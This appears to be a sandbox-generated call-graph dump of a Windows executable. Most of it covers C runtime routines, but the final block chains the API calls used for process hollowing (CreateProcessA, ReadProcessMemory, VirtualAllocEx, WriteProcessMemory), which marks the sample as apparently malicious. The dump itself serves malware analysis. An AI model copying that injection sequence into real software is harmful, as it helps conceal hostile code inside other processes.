38ee48 ___free_lconv_mon 14 API calls 14000->14001 14024 39656c 14000->14024 14002 396540 14001->14002 14004 38ee48 ___free_lconv_mon 14 API calls 14002->14004 14005 396509 14003->14005 14010 38ee48 ___free_lconv_mon 14 API calls 14003->14010 14006 396553 14004->14006 14007 38ee48 ___free_lconv_mon 14 API calls 14005->14007 14009 38ee48 ___free_lconv_mon 14 API calls 14006->14009 14011 396513 14007->14011 14013 3964dc 14008->14013 14014 396561 14009->14014 14015 3964fe 14010->14015 14016 38ee48 ___free_lconv_mon 14 API calls 14011->14016 14012 3965da 14017 38ee48 ___free_lconv_mon 14 API calls 14012->14017 14025 395754 14013->14025 14020 38ee48 ___free_lconv_mon 14 API calls 14014->14020 14053 395c08 14015->14053 14016->14000 14023 3965e0 14017->14023 14019 39657a 14019->14012 14022 38ee48 14 API calls ___free_lconv_mon 14019->14022 14020->14024 14022->14019 14023->13993 14065 39660f 14024->14065 14026 395765 14025->14026 14052 39584e 14025->14052 14027 395776 14026->14027 14028 38ee48 ___free_lconv_mon 14 API calls 14026->14028 14029 38ee48 ___free_lconv_mon 14 API calls 14027->14029 14031 395788 14027->14031 14028->14027 14029->14031 14030 39579a 14033 3957ac 14030->14033 14035 38ee48 ___free_lconv_mon 14 API calls 14030->14035 14031->14030 14032 38ee48 ___free_lconv_mon 14 API calls 14031->14032 14032->14030 14034 3957be 14033->14034 14036 38ee48 ___free_lconv_mon 14 API calls 14033->14036 14037 3957d0 14034->14037 14038 38ee48 ___free_lconv_mon 14 API calls 14034->14038 14035->14033 14036->14034 14039 3957e2 14037->14039 14040 38ee48 ___free_lconv_mon 14 API calls 14037->14040 14038->14037 14041 3957f4 14039->14041 14043 38ee48 ___free_lconv_mon 14 API calls 14039->14043 14040->14039 14042 395806 14041->14042 14044 38ee48 ___free_lconv_mon 14 API calls 14041->14044 14045 395818 14042->14045 14046 38ee48 ___free_lconv_mon 14 API calls 14042->14046 14043->14041 14044->14042 14047 39582a 14045->14047 14048 38ee48 ___free_lconv_mon 14 API calls 14045->14048 14046->14045 14049 39583c 14047->14049 14050 38ee48 ___free_lconv_mon 14 API calls 14047->14050 14048->14047 14051 38ee48 ___free_lconv_mon 14 API calls 14049->14051 14049->14052 14050->14049 14051->14052 14052->14003 14054 395c15 14053->14054 14064 395c6d 14053->14064 14055 395c25 14054->14055 14056 38ee48 ___free_lconv_mon 14 API calls 14054->14056 14057 395c37 14055->14057 14058 38ee48 ___free_lconv_mon 14 API calls 14055->14058 14056->14055 14059 38ee48 ___free_lconv_mon 14 API calls 14057->14059 14061 395c49 14057->14061 14058->14057 14059->14061 14060 395c5b 14063 38ee48 ___free_lconv_mon 14 API calls 14060->14063 14060->14064 14061->14060 14062 38ee48 ___free_lconv_mon 14 API calls 14061->14062 14062->14060 14063->14064 14064->14005 14066 39661c 14065->14066 14070 39663b 14065->14070 14067 396123 __Getctype 14 API calls 14066->14067 14066->14070 14068 396635 14067->14068 14069 38ee48 ___free_lconv_mon 14 API calls 14068->14069 14069->14070 14070->14019 14071->13996 14108 392d2c 14072->14108 14075 392e3f 14076 392e4b ___scrt_is_nonwritable_in_current_image 14075->14076 14077 392e78 __CreateFrameInfo 14076->14077 14078 38ec51 __dosmaperr 14 API calls 14076->14078 14082 392e72 __CreateFrameInfo 14076->14082 14085 392eeb 14077->14085 14122 38a722 EnterCriticalSection 14077->14122 14078->14082 14079 392ebf 14080 38b188 __dosmaperr 14 API calls 14079->14080 14083 392ec4 14080->14083 14081 392ea9 14081->13911 14082->14077 14082->14079 14082->14081 14119 389007 14083->14119 14088 392f2d 14085->14088 14089 39301e 14085->14089 14099 392f5c 14085->14099 14088->14099 14123 38eb00 GetLastError 14088->14123 14091 393029 14089->14091 14154 38a76a LeaveCriticalSection 14089->14154 14093 38c29e __CreateFrameInfo 23 API calls 14091->14093 14095 393031 14093->14095 14096 38eb00 __Getctype 41 API calls 14100 392fb1 14096->14100 14098 38eb00 __Getctype 41 API calls 14098->14099 14150 392fcb 14099->14150 14100->14081 14101 38eb00 __Getctype 41 API calls 14100->14101 14101->14081 14103 388e27 __fread_nolock __CreateFrameInfo 14102->14103 14104 388e53 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14103->14104 14107 388f24 __CreateFrameInfo 14104->14107 14106 388f42 14106->13909 14179 384791 14107->14179 14109 392d38 ___scrt_is_nonwritable_in_current_image 14108->14109 14114 38a722 EnterCriticalSection 14109->14114 14111 392d46 14115 392d84 14111->14115 14114->14111 14118 38a76a LeaveCriticalSection 14115->14118 14117 38b0ac 14117->13911 14117->14075 14118->14117 14155 388f53 14119->14155 14122->14085 14124 38eb1c 14123->14124 14125 38eb16 14123->14125 14127 38f373 __dosmaperr 6 API calls 14124->14127 14129 38eb20 SetLastError 14124->14129 14126 38f334 __dosmaperr 6 API calls 14125->14126 14126->14124 14128 38eb38 14127->14128 14128->14129 14131 38edeb __dosmaperr 14 API calls 14128->14131 14133 38ebb0 14129->14133 14134 38ebb5 14129->14134 14132 38eb4d 14131->14132 14135 38eb55 14132->14135 14136 38eb66 14132->14136 14133->14098 14137 38b0a7 __purecall 39 API calls 14134->14137 14138 38f373 __dosmaperr 6 API calls 14135->14138 14139 38f373 __dosmaperr 6 API calls 14136->14139 14140 38ebba 14137->14140 14141 38eb63 14138->14141 14142 38eb72 14139->14142 14147 38ee48 ___free_lconv_mon 14 API calls 14141->14147 14143 38eb8d 14142->14143 14144 38eb76 14142->14144 14145 38e92e __dosmaperr 14 API calls 14143->14145 14146 38f373 __dosmaperr 6 API calls 14144->14146 14148 38eb98 14145->14148 14146->14141 14147->14129 14149 38ee48 ___free_lconv_mon 14 API calls 14148->14149 14149->14129 14151 392fa2 14150->14151 14152 392fd1 14150->14152 14151->14081 14151->14096 14151->14100 14178 38a76a LeaveCriticalSection 14152->14178 14154->14091 14156 388f65 _Fputc 14155->14156 14161 388f8a 14156->14161 14158 388f7d 14172 388d43 14158->14172 14162 388f9a 14161->14162 14163 388fa1 14161->14163 14164 388da8 _Deallocate 16 API calls 14162->14164 14165 388d7f _Deallocate GetLastError SetLastError 14163->14165 14167 388faf 14163->14167 14164->14163 14166 388fd6 14165->14166 14166->14167 14168 389034 _Deallocate 11 API calls 14166->14168 14167->14158 14169 389006 14168->14169 14170 388f53 _Deallocate 41 API calls 14169->14170 14171 389013 14170->14171 14171->14158 14173 388d4f 14172->14173 14174 388dee _Fputc 41 API calls 14173->14174 14176 388d66 14173->14176 14174->14176 14175 388d79 14175->14081 14176->14175 14177 388dee _Fputc 41 API calls 14176->14177 14177->14175 14178->14151 14180 384799 14179->14180 14181 38479a IsProcessorFeaturePresent 14179->14181 14180->14106 14183 3850d2 14181->14183 14186 385095 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14183->14186 14185 3851b5 14185->14106 14186->14185 14188 394cc0 ___scrt_is_nonwritable_in_current_image 14187->14188 14190 394cda 14188->14190 14233 38a722 EnterCriticalSection 14188->14233 14191 394b89 14190->14191 14193 38b0a7 __purecall 41 API calls 14190->14193 14198 3948df 14191->14198 14192 394d16 14234 394d33 14192->14234 14195 394d53 14193->14195 14196 394cea 14196->14192 14197 38ee48 ___free_lconv_mon 14 API calls 14196->14197 14197->14192 14238 38b19b 14198->14238 14201 394900 GetOEMCP 14203 394929 14201->14203 14202 394912 14202->14203 14204 394917 GetACP 14202->14204 14203->13864 14205 391e71 14203->14205 14204->14203 14206 391eaf 14205->14206 14207 391e7f 14205->14207 14208 38b188 __dosmaperr 14 API calls 14206->14208 14209 391e9a HeapAlloc 14207->14209 14212 391e83 __dosmaperr 14207->14212 14210 391eb4 14208->14210 14211 391ead 14209->14211 14209->14212 14210->13867 14210->13868 14211->14210 14212->14206 14212->14209 14213 38dac3 std::_Facet_Register 2 API calls 14212->14213 14213->14212 14215 3948df 43 API calls 14214->14215 14216 394dcf 14215->14216 14218 394e0c IsValidCodePage 14216->14218 14223 394e48 __fread_nolock 14216->14223 14217 384791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14219 394bf6 14217->14219 14220 394e1e 14218->14220 14218->14223 14219->13872 14219->13876 14221 394e4d GetCPInfo 14220->14221 14224 394e27 __fread_nolock 14220->14224 14221->14223 14221->14224 14223->14217 14223->14223 14280 3949b3 14224->14280 14226 3947dd ___scrt_is_nonwritable_in_current_image 14225->14226 14361 38a722 EnterCriticalSection 14226->14361 14228 3947e7 14362 39481e 14228->14362 14233->14196 14237 38a76a LeaveCriticalSection 14234->14237 14236 394d3a 14236->14190 14237->14236 14239 38b1b9 14238->14239 14240 38b1b2 14238->14240 14239->14240 14241 38eb00 __Getctype 41 API calls 14239->14241 14240->14201 14240->14202 14242 38b1da 14241->14242 14246 39256a 14242->14246 14247 39257d 14246->14247 14248 38b1f0 14246->14248 14247->14248 14254 3966ea 14247->14254 14250 3925c8 14248->14250 14251 3925db 14250->14251 14252 3925f0 14250->14252 14251->14252 14275 394d9c 14251->14275 14252->14240 14255 3966f6 ___scrt_is_nonwritable_in_current_image 14254->14255 14256 38eb00 __Getctype 41 API calls 14255->14256 14257 3966ff 14256->14257 14264 396745 14257->14264 14267 38a722 EnterCriticalSection 14257->14267 14259 39671d 14268 39676b 14259->14268 14264->14248 14265 38b0a7 __purecall 41 API calls 14266 39676a 14265->14266 14267->14259 14269 396779 __Getctype 14268->14269 14271 39672e 14268->14271 14270 39649e __Getctype 14 API calls 14269->14270 14269->14271 14270->14271 14272 39674a 14271->14272 14273 38a76a std::_Lockit::~_Lockit LeaveCriticalSection 14272->14273 14274 396741 14273->14274 14274->14264 14274->14265 14276 38eb00 __Getctype 41 API calls 14275->14276 14277 394da1 14276->14277 14278 394cb4 __strnicoll 41 API calls 14277->14278 14279 394dac 14278->14279 14279->14252 14281 3949db GetCPInfo 14280->14281 14290 394aa4 14280->14290 14286 3949f3 14281->14286 14281->14290 14283 384791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14285 394b5d 14283->14285 14285->14223 14291 392988 14286->14291 14289 392c7f 46 API calls 14289->14290 14290->14283 14292 38b19b __strnicoll 41 API calls 14291->14292 14293 3929a8 14292->14293 14311 393c28 14293->14311 14295 392a6c 14298 384791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14295->14298 14296 392a64 14314 384522 14296->14314 14297 3929d5 14297->14295 14297->14296 14300 391e71 std::_Locinfo::_Locinfo_dtor 15 API calls 14297->14300 14302 3929fa __fread_nolock __alloca_probe_16 14297->14302 14301 392a8f 14298->14301 14300->14302 14306 392c7f 14301->14306 14302->14296 14303 393c28 __strnicoll MultiByteToWideChar 14302->14303 14304 392a45 14303->14304 14304->14296 14305 392a50 GetStringTypeW 14304->14305 14305->14296 14307 38b19b __strnicoll 41 API calls 14306->14307 14308 392c92 14307->14308 14321 392a91 14308->14321 14313 393c39 MultiByteToWideChar 14311->14313 14313->14297 14315 38452c 14314->14315 14316 38453d 14314->14316 14315->14316 14318 38a6c6 14315->14318 14316->14295 14319 38ee48 ___free_lconv_mon 14 API calls 14318->14319 14320 38a6de 14319->14320 14320->14316 14322 392aac ctype 14321->14322 14323 393c28 __strnicoll MultiByteToWideChar 14322->14323 14326 392af2 14323->14326 14324 384791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14325 392c7d 14324->14325 14325->14289 14327 391e71 std::_Locinfo::_Locinfo_dtor 15 API calls 14326->14327 14329 392b18 __alloca_probe_16 14326->14329 14330 392c6a 14326->14330 14338 392b9e 14326->14338 14327->14329 14328 384522 __freea 14 API calls 14328->14330 14331 393c28 __strnicoll MultiByteToWideChar 14329->14331 14329->14338 14330->14324 14332 392b5d 14331->14332 14332->14338 14349 38f4f2 14332->14349 14335 392b8f 14335->14338 14341 38f4f2 std::_Locinfo::_Locinfo_dtor 7 API calls 14335->14341 14336 392bc7 14337 392c52 14336->14337 14339 391e71 std::_Locinfo::_Locinfo_dtor 15 API calls 14336->14339 14342 392bd9 __alloca_probe_16 14336->14342 14340 384522 __freea 14 API calls 14337->14340 14338->14328 14339->14342 14340->14338 14341->14338 14342->14337 14343 38f4f2 std::_Locinfo::_Locinfo_dtor 7 API calls 14342->14343 14344 392c1c 14343->14344 14344->14337 14358 393ca4 14344->14358 14346 392c36 14346->14337 14347 392c3f 14346->14347 14348 384522 __freea 14 API calls 14347->14348 14348->14338 14350 38f024 std::_Lockit::_Lockit 5 API calls 14349->14350 14351 38f4fd 14350->14351 14352 38f52a 14351->14352 14353 38f503 LCMapStringEx 14351->14353 14354 38f54f __strnicoll 5 API calls 14352->14354 14357 38f54a 14353->14357 14356 38f543 LCMapStringW 14354->14356 14356->14357 14357->14335 14357->14336 14357->14338 14360 393cbb WideCharToMultiByte 14358->14360 14360->14346 14361->14228 14372 389c89 14362->14372 14364 394840 14365 389c89 __fread_nolock 41 API calls 14364->14365 14366 39485f 14365->14366 14367 3947f4 14366->14367 14368 38ee48 ___free_lconv_mon 14 API calls 14366->14368 14369 394812 14367->14369 14368->14367 14386 38a76a LeaveCriticalSection 14369->14386 14371 394800 14371->13880 14373 389c9a 14372->14373 14381 389c96 ctype 14372->14381 14374 389ca1 14373->14374 14377 389cb4 __fread_nolock 14373->14377 14375 38b188 __dosmaperr 14 API calls 14374->14375 14376 389ca6 14375->14376 14378 389007 __strnicoll 41 API calls 14376->14378 14379 389ceb 14377->14379 14380 389ce2 14377->14380 14377->14381 14378->14381 14379->14381 14384 38b188 __dosmaperr 14 API calls 14379->14384 14382 38b188 __dosmaperr 14 API calls 14380->14382 14381->14364 14383 389ce7 14382->14383 14385 389007 __strnicoll 41 API calls 14383->14385 14384->14383 14385->14381 14386->14371 14388 38e074 14387->14388 14389 38e082 14387->14389 14388->14389 14394 38e09a 14388->14394 14390 38b188 __dosmaperr 14 API calls 14389->14390 14391 38e08a 14390->14391 14392 389007 __strnicoll 41 API calls 14391->14392 14393 38e094 14392->14393 14393->13822 14394->14393 14395 38b188 __dosmaperr 14 API calls 14394->14395 14395->14391 14400 38bde7 14396->14400 14401 38bdb8 14396->14401 14397 38bdfe 14399 38ee48 ___free_lconv_mon 14 API calls 14397->14399 14398 38ee48 ___free_lconv_mon 14 API calls 14398->14400 14399->14401 14400->14397 14400->14398 14401->13823 14403 389040 14402->14403 14404 388e0b __CreateFrameInfo 8 API calls 14403->14404 14405 389055 GetCurrentProcess TerminateProcess 14404->14405 14405->13829 14408 381737 __EH_prolog3_catch _strlen 14406->14408 14440 381aff 14408->14440 14410 3818d8 14453 381ae4 14410->14453 14412 3818e0 std::ios_base::_Init 14412->13632 14413 38179c 14444 3814f1 14413->14444 14415 3815d4 _strlen 14414->14415 14590 3818ee 14415->14590 14417 3815e1 14417->13634 14419 3816aa 14418->14419 14421 381680 std::ios_base::_Init 14418->14421 14597 3819c7 14419->14597 14421->13636 14423 39c01c 14422->14423 14424 39c089 14423->14424 14617 381e21 14423->14617 14425 39c09c 14424->14425 14427 381a7b _Deallocate 41 API calls 14424->14427 14425->13641 14427->14425 14429 38479f std::_Facet_Register 43 API calls 14428->14429 14431 39c0c4 14429->14431 14432 381a7b _Deallocate 41 API calls 14431->14432 14433 39c1f5 14431->14433 14639 381cbf 14431->14639 14432->14431 14434 384791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14433->14434 14435 39c210 CreateThread WaitForSingleObjectEx 14434->14435 14436 381644 14435->14436 14437 381658 14436->14437 14438 38164f 14436->14438 14437->13646 14439 381a7b _Deallocate 41 API calls 14438->14439 14439->14437 14442 381b1d 14440->14442 14441 381b40 14441->14413 14442->14441 14457 381ba4 14442->14457 14445 38154c 14444->14445 14447 381508 std::ios_base::_Init 14444->14447 14445->14410 14452 381541 14447->14452 14465 3814c8 14447->14465 14448 38155a 14471 38144e 14448->14471 14468 385ad1 14452->14468 14454 381aec 14453->14454 14455 381af7 14454->14455 14586 381c62 14454->14586 14455->14412 14458 381bb0 __EH_prolog3_catch 14457->14458 14459 381c55 std::ios_base::_Init 14458->14459 14460 381aff 43 API calls 14458->14460 14459->14441 14462 381bcf 14460->14462 14461 381c4d 14463 381ae4 43 API calls 14461->14463 14462->14461 14464 3814f1 std::ios_base::_Init 43 API calls 14462->14464 14463->14459 14464->14461 14474 3813dd 14465->14474 14469 385b18 RaiseException 14468->14469 14470 385aeb 14468->14470 14469->14448 14470->14469 14583 381105 14471->14583 14475 3815b7 std::ios_base::_Init 43 API calls 14474->14475 14476 381401 14475->14476 14483 38134d 14476->14483 14479 381644 std::ios_base::_Init 41 API calls 14480 38141c 14479->14480 14481 384791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14480->14481 14482 381430 14481->14482 14482->14452 14494 381610 14483->14494 14490 381644 std::ios_base::_Init 41 API calls 14491 381390 14490->14491 14492 384791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14491->14492 14493 3813af 14492->14493 14493->14479 14495 381630 14494->14495 14514 38195f 14495->14514 14497 38136e 14498 3812cb 14497->14498 14499 3812fc 14498->14499 14500 3812e6 _strlen 14498->14500 14502 38166a std::ios_base::_Init 43 API calls 14499->14502 14501 38166a std::ios_base::_Init 43 API calls 14500->14501 14501->14499 14503 381322 14502->14503 14504 381644 std::ios_base::_Init 41 API calls 14503->14504 14505 38132a std::ios_base::_Init 14504->14505 14506 381644 std::ios_base::_Init 41 API calls 14505->14506 14507 38133d 14506->14507 14508 384791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14507->14508 14509 38134b 14508->14509 14510 381209 14509->14510 14511 381216 14510->14511 14565 3810d0 14511->14565 14515 3819c1 14514->14515 14518 381970 std::ios_base::_Init 14514->14518 14529 3811fe 14515->14529 14520 381977 std::ios_base::_Init ctype 14518->14520 14521 381f40 14518->14521 14520->14497 14522 381f4b 14521->14522 14525 381f53 14521->14525 14532 381f6d 14522->14532 14524 381f5f 14524->14520 14525->14524 14546 38479f 14525->14546 14526 381f51 14526->14520 14528 381f5d 14528->14520 14560 383a16 14529->14560 14533 381f7c 14532->14533 14534 38118f Concurrency::cancel_current_task 14532->14534 14535 38479f std::_Facet_Register 43 API calls 14533->14535 14537 385ad1 CallUnexpected RaiseException 14534->14537 14538 381f82 14535->14538 14536 381f89 14536->14526 14539 3811ab 14537->14539 14538->14536 14540 388f53 _Deallocate 41 API calls 14538->14540 14541 381105 std::bad_exception::bad_exception 42 API calls 14539->14541 14542 389026 14540->14542 14543 3811b8 14541->14543 14544 389034 _Deallocate 11 API calls 14542->14544 14543->14526 14545 389033 14544->14545 14549 3847a4 14546->14549 14547 38a798 _Yarn 15 API calls 14547->14549 14548 3847be 14548->14528 14549->14547 14549->14548 14550 38dac3 std::_Facet_Register EnterCriticalSection LeaveCriticalSection 14549->14550 14551 3847c0 14549->14551 14550->14549 14552 38118f Concurrency::cancel_current_task 14551->14552 14553 3847ca std::_Facet_Register 14551->14553 14554 385ad1 CallUnexpected RaiseException 14552->14554 14555 385ad1 CallUnexpected RaiseException 14553->14555 14556 3811ab 14554->14556 14557 3852ae 14555->14557 14558 381105 std::bad_exception::bad_exception 42 API calls 14556->14558 14559 3811b8 14558->14559 14559->14528 14561 3839bd std::invalid_argument::invalid_argument 42 API calls 14560->14561 14562 383a27 14561->14562 14563 385ad1 CallUnexpected RaiseException 14562->14563 14564 383a35 14563->14564 14568 3852eb 14565->14568 14569 3852f8 14568->14569 14575 3810fc 14568->14575 14569->14575 14576 38a798 14569->14576 14572 385325 14573 38a6c6 _Yarn 14 API calls 14572->14573 14573->14575 14574 38e066 ___std_exception_copy 41 API calls 14574->14572 14575->14490 14581 391e71 __dosmaperr 14576->14581 14577 391eaf 14578 38b188 __dosmaperr 14 API calls 14577->14578 14580 385315 14578->14580 14579 391e9a HeapAlloc 14579->14580 14579->14581 14580->14572 14580->14574 14581->14577 14581->14579 14582 38dac3 std::_Facet_Register EnterCriticalSection LeaveCriticalSection 14581->14582 14582->14581 14584 3852eb ___std_exception_copy 42 API calls 14583->14584 14585 381126 14584->14585 14585->14410 14588 381c6e __EH_prolog3_catch 14586->14588 14587 381caa std::ios_base::_Init 14587->14455 14588->14587 14589 3814f1 std::ios_base::_Init 43 API calls 14588->14589 14589->14587 14591 381959 14590->14591 14594 3818ff std::ios_base::_Init 14590->14594 14592 3811fe std::ios_base::_Init 43 API calls 14591->14592 14593 38195e 14592->14593 14595 381f40 std::ios_base::_Init 43 API calls 14594->14595 14596 381906 std::ios_base::_Init 14594->14596 14595->14596 14596->14417 14598 381a75 14597->14598 14600 3819e4 std::ios_base::_Init 14597->14600 14599 3811fe std::ios_base::_Init 43 API calls 14598->14599 14601 381a7a 14599->14601 14602 381f40 std::ios_base::_Init 43 API calls 14600->14602 14603 381a03 std::ios_base::_Init 14602->14603 14605 381a43 std::ios_base::_Init 14603->14605 14606 381a7b 14603->14606 14605->14421 14607 381a88 14606->14607 14608 381a95 error_info_injector 14606->14608 14610 3811dc 14607->14610 14608->14605 14611 3811f9 14610->14611 14612 3811f6 14610->14612 14613 388f53 _Deallocate 41 API calls 14611->14613 14612->14608 14614 389026 14613->14614 14615 389034 _Deallocate 11 API calls 14614->14615 14616 389033 14615->14616 14618 381e2d __EH_prolog3_catch 14617->14618 14619 381e4a 14618->14619 14620 381f30 14618->14620 14622 381e67 14619->14622 14623 381f35 14619->14623 14630 381f62 14620->14630 14625 381f40 std::ios_base::_Init 43 API calls 14622->14625 14633 38118f 14623->14633 14627 381e7d ctype 14625->14627 14628 381efc std::ios_base::_Init 14627->14628 14629 381a7b _Deallocate 41 API calls 14627->14629 14628->14423 14629->14628 14631 383a16 std::_Xinvalid_argument 43 API calls 14630->14631 14632 381f6c 14631->14632 14634 38119d Concurrency::cancel_current_task 14633->14634 14635 385ad1 CallUnexpected RaiseException 14634->14635 14636 3811ab 14635->14636 14637 381105 std::bad_exception::bad_exception 42 API calls 14636->14637 14638 3811b8 14637->14638 14640 381ccb __EH_prolog3_catch 14639->14640 14641 381ce8 14640->14641 14642 381dd2 14640->14642 14643 381d05 14641->14643 14645 381dd7 14641->14645 14644 381f62 43 API calls 14642->14644 14646 381f40 std::ios_base::_Init 43 API calls 14643->14646 14644->14645 14647 38118f Concurrency::cancel_current_task 43 API calls 14645->14647 14649 381d1b ctype 14646->14649 14648 381ddc 14647->14648 14650 381d9e std::ios_base::_Init 14649->14650 14651 381a7b _Deallocate 41 API calls 14649->14651 14650->14431 14651->14650 14653 38c0ef 14652->14653 14654 38c101 14652->14654 14679 38c18a GetModuleHandleW 14653->14679 14664 38bf8a 14654->14664 14659 38477e 14659->13672 14663 38c153 14665 38bf96 ___scrt_is_nonwritable_in_current_image 14664->14665 14687 38a722 EnterCriticalSection 14665->14687 14667 38bfa0 14688 38bfd7 14667->14688 14669 38bfad 14692 38bfcb 14669->14692 14672 38c159 14717 38c1cd 14672->14717 14675 38c177 14677 38c1ef __CreateFrameInfo 3 API calls 14675->14677 14676 38c167 GetCurrentProcess TerminateProcess 14676->14675 14678 38c17f ExitProcess 14677->14678 14680 38c0f4 14679->14680 14680->14654 14681 38c1ef GetModuleHandleExW 14680->14681 14682 38c22e GetProcAddress 14681->14682 14683 38c24f 14681->14683 14682->14683 14686 38c242 14682->14686 14684 38c100 14683->14684 14685 38c255 FreeLibrary 14683->14685 14684->14654 14685->14684 14686->14683 14687->14667 14690 38bfe3 ___scrt_is_nonwritable_in_current_image 14688->14690 14689 38c04a __CreateFrameInfo 14689->14669 14690->14689 14695 38ddf4 14690->14695 14716 38a76a LeaveCriticalSection 14692->14716 14694 38bfb9 14694->14659 14694->14672 14696 38de00 __EH_prolog3 14695->14696 14699 38db4c 14696->14699 14698 38de27 std::ios_base::_Init 14698->14689 14700 38db58 ___scrt_is_nonwritable_in_current_image 14699->14700 14707 38a722 EnterCriticalSection 14700->14707 14702 38db66 14708 38dd04 14702->14708 14707->14702 14709 38db73 14708->14709 14710 38dd23 14708->14710 14712 38db9b 14709->14712 14710->14709 14711 38ee48 ___free_lconv_mon 14 API calls 14710->14711 14711->14709 14715 38a76a LeaveCriticalSection 14712->14715 14714 38db84 14714->14698 14715->14714 14716->14694 14722 39547e GetPEB 14717->14722 14720 38c163 14720->14675 14720->14676 14721 38c1d7 GetPEB 14721->14720 14723 395498 14722->14723 14724 38c1d2 14722->14724 14726 38f1a6 14723->14726 14724->14720 14724->14721 14727 38f123 std::_Lockit::_Lockit 5 API calls 14726->14727 14728 38f1c2 14727->14728 14728->14724 14730 38dfb8 ___scrt_uninitialize_crt 14729->14730 14731 38dfa6 14729->14731 14730->13666 14732 38dfb4 14731->14732 14734 38965a 14731->14734 14732->13666 14737 3894e7 14734->14737 14740 3893db 14737->14740 14741 3893e7 ___scrt_is_nonwritable_in_current_image 14740->14741 14748 38a722 EnterCriticalSection 14741->14748 14743 38945d 14757 38947b 14743->14757 14746 3893f1 ___scrt_uninitialize_crt 14746->14743 14749 38934f 14746->14749 14748->14746 14750 38935b ___scrt_is_nonwritable_in_current_image 14749->14750 14760 3891d2 EnterCriticalSection 14750->14760 14752 389365 ___scrt_uninitialize_crt 14753 38939e 14752->14753 14761 3895f5 14752->14761 14774 3893cf 14753->14774 14876 38a76a LeaveCriticalSection 14757->14876 14759 389469 14759->14732 14760->14752 14762 38960a _Fputc 14761->14762 14763 38961c 14762->14763 14764 389611 14762->14764 14777 38958c 14763->14777 14765 3894e7 ___scrt_uninitialize_crt 70 API calls 14764->14765 14767 389617 14765->14767 14769 388d43 _Fputc 41 API calls 14767->14769 14770 389654 14769->14770 14770->14753 14772 38963d 14790 38fbc1 14772->14790 14875 3891e6 LeaveCriticalSection 14774->14875 14776 3893bd 14776->14746 14778 3895a5 14777->14778 14779 3895cc 14777->14779 14778->14779 14780 38f8e9 __fread_nolock 41 API calls 14778->14780 14779->14767 14783 38f8e9 14779->14783 14781 3895c1 14780->14781 14801 3903ec 14781->14801 14784 38f90a 14783->14784 14785 38f8f5 14783->14785 14784->14772 14786 38b188 __dosmaperr 14 API calls 14785->14786 14787 38f8fa 14786->14787 14788 389007 __strnicoll 41 API calls 14787->14788 14789 38f905 14788->14789 14789->14772 14791 38fbdf 14790->14791 14792 38fbd2 14790->14792 14793 38fc28 14791->14793 14796 38fc06 14791->14796 14794 38b188 __dosmaperr 14 API calls 14792->14794 14795 38b188 __dosmaperr 14 API calls 14793->14795 14800 38fbd7 14794->14800 14797 38fc2d 14795->14797 14842 38fb1f 14796->14842 14799 389007 __strnicoll 41 API calls 14797->14799 14799->14800 14800->14767 14804 3903f8 ___scrt_is_nonwritable_in_current_image 14801->14804 14802 390400 14802->14779 14803 3904bc 14805 388f8a _Deallocate 41 API calls 14803->14805 14804->14802 14804->14803 14806 39044d 14804->14806 14805->14802 14812 3955fd EnterCriticalSection 14806->14812 14808 390453 14810 390470 14808->14810 14813 3904f4 14808->14813 14839 3904b4 14810->14839 14812->14808 14814 390519 14813->14814 14838 39053c __fread_nolock 14813->14838 14815 39051d 14814->14815 14817 39057b 14814->14817 14816 388f8a _Deallocate 41 API calls 14815->14816 14816->14838 14818 390592 14817->14818 14819 391cd2 ___scrt_uninitialize_crt 43 API calls 14817->14819 14820 390078 ___scrt_uninitialize_crt 42 API calls 14818->14820 14819->14818 14821 39059c 14820->14821 14822 3905e2 14821->14822 14823 3905a2 14821->14823 14824 390645 WriteFile 14822->14824 14825 3905f6 14822->14825 14826 3905a9 14823->14826 14827 3905cc 14823->14827 14830 390667 GetLastError 14824->14830 14824->14838 14828 3905fe 14825->14828 14829 390633 14825->14829 14834 390010 ___scrt_uninitialize_crt 6 API calls 14826->14834 14826->14838 14831 38fc3e ___scrt_uninitialize_crt 47 API calls 14827->14831 14832 390621 14828->14832 14833 390603 14828->14833 14835 3900f6 ___scrt_uninitialize_crt 7 API calls 14829->14835 14830->14838 14831->14838 14836 3902ba ___scrt_uninitialize_crt 8 API calls 14832->14836 14837 3901d1 ___scrt_uninitialize_crt 7 API calls 14833->14837 14833->14838 14834->14838 14835->14838 14836->14838 14837->14838 14838->14810 14840 395620 ___scrt_uninitialize_crt LeaveCriticalSection 14839->14840 14841 3904ba 14840->14841 14841->14802 14843 38fb2b ___scrt_is_nonwritable_in_current_image 14842->14843 14855 3955fd EnterCriticalSection 14843->14855 14845 38fb3a 14846 38fb7f 14845->14846 14856 3956d4 14845->14856 14847 38b188 __dosmaperr 14 API calls 14846->14847 14849 38fb86 14847->14849 14872 38fbb5 14849->14872 14850 38fb66 FlushFileBuffers 14850->14849 14851 38fb72 GetLastError 14850->14851 14869 38b175 14851->14869 14855->14845 14857 3956e1 14856->14857 14858 3956f6 14856->14858 14859 38b175 __dosmaperr 14 API calls 14857->14859 14861 38b175 __dosmaperr 14 API calls 14858->14861 14863 39571b 14858->14863 14860 3956e6 14859->14860 14862 38b188 __dosmaperr 14 API calls 14860->14862 14864 395726 14861->14864 14866 3956ee 14862->14866 14863->14850 14865 38b188 __dosmaperr 14 API calls 14864->14865 14867 39572e 14865->14867 14866->14850 14868 389007 __strnicoll 41 API calls 14867->14868 14868->14866 14870 38ec51 __dosmaperr 14 API calls 14869->14870 14871 38b17a 14870->14871 14871->14846 14873 395620 ___scrt_uninitialize_crt LeaveCriticalSection 14872->14873 14874 38fb9e 14873->14874 14874->14800 14875->14776 14876->14759 13585 ee018d 13586 ee01c5 13585->13586 13586->13586 13587 ee02d3 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 13586->13587 13587->13586 13588 ee03a2 WriteProcessMemory 13587->13588 13589 ee03e7 13588->13589 13590 ee03ec WriteProcessMemory 13589->13590 13591 